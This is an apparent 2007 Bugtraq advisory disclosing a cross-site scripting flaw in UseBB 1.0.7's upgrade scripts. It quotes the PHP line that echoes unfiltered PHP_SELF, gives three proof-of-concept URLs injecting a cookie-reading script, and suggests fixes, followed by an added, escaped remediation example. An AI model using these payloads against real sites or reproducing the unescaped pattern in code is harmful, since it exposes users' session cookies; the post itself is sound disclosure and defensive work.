Date: 20 Jul 2007 19:54:36 -0000
From: s4mi@...uxMail.org
To: bugtraq@...urityfocus.com
Subject: UseBB 1.0.x  Cross Site Scripting (XSS)

#############################################################
#	Script...............: UseBB version: 1.0.7	    #
#	Script Site..........: http://www.usebb.net	    #
#	Vulnerability........: Cross Site Scripting (XSS)   #
#	Access...............: Remote			    #
#	level................: Dangerous		    #
#	Author...............: S4mi			    #
#	Contact..............: s4mi[at]LinuxMail.org	    #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step '.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variable PHP_SELF is used without filtering.

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

Solution :
====================

Filter PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
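
Added example (not part of the original post and not UseBB's own code): one way to build the same form with the action taken from SCRIPT_NAME and every dynamic value HTML-escaped. The function names attr() and step_form() and the sample request data are hypothetical and constructed for illustration; the SCRIPT_NAME behaviour noted in the comment assumes a typical Apache/CGI PHP setup.

```php
<?php
// Added example, not UseBB code. Function names are hypothetical.

// Escape a value for use inside a quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Form builder in the shape of the reported line, with every dynamic value escaped.
function step_form(array $server, array $post, int $step): string
{
    // Assumption: typical Apache/CGI setup, where SCRIPT_NAME omits the
    // PATH_INFO suffix that PHP_SELF carries, so text appended after ".php/"
    // never reaches the action attribute.
    $action = $server['SCRIPT_NAME'] ?? '';
    $retry  = isset($post['step']) && (int) $post['step'] === $step;
    $label  = ($retry ? 'Retry step ' : 'Continue to step ') . $step;

    return '<form action="' . attr($action) . '" method="post"><p>'
        . '<input type="hidden" name="step" value="' . attr((string) $step) . '" />'
        . '<input type="submit" value="' . attr($label) . '" /></p></form>';
}

// Constructed request data modelled on the URLs listed in the post.
$server = [
    'SCRIPT_NAME' => '/UseBB/install/upgrade-0-4.php',
    'PHP_SELF'    => '/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>',
];

// The rendered form contains only the script path in its action attribute.
echo step_form($server, ['step' => '2'], 2), "\n";

// If PHP_SELF has to be kept, escaping turns the quote and angle brackets
// into entities, so the value stays inside the attribute as inert text.
echo attr($server['PHP_SELF']), "\n";
```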
